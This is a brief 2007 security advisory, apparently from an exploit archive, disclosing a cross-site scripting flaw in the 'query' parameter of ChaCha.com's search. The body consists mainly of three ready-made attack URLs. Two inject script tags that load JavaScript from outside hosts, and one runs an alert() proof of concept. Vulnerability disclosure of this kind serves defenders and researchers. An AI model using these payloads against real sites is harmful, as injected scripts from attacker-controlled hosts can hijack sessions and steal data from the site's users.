Home / os / winme

chacha-xss.txt

Posted on 31 August 2007

[+] ChaCha.com Search ?query= Cross-Site Scripting Vulnerability [+] Author: d3hydr8 [+] Contact: d3hydr8[at]gmail[dot]com [+] Original Post: http://darkcode.h1x.com/forum/index.php?action=vthread&forum=12&topic=275 [+] Vendor Site: http://www.chacha.com/ [+] Class: Input Validation Error [+] Overview: The first search engine that uses the brainpower of really smart people to find anything you want on the Internet. Here's how you use it [+] Example: 1.http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC= http://darkcode.h1x.com/xss.js%3E%3C/SCRIPT%3E 2.http://search.chacha.com/search/query?query=%3CSCRIPT%20SRC= http://ha.ckers.org/xss.js%3E%3C/SCRIPT%3E 3 .http://search.chacha.com/search/query?query=<SCRIPT>alert("XSS");//<</SCRIPT>

 

TOP